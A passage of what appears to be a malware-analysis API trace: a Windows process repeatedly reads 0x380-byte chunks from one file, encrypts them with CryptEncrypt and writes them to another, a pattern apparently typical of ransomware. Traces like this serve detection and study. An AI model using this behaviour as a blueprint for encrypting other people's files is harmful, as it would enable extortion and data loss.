lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.552] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.553] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.554] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.554] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.554] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.554] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.554] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.554] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.554] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.554] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.554] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.555] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.556] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.556] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.556] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.556] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.556] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.556] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.556] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.556] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.556] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.557] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.557] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.557] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.557] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.557] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.557] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.557] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.557] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.557] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.558] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: 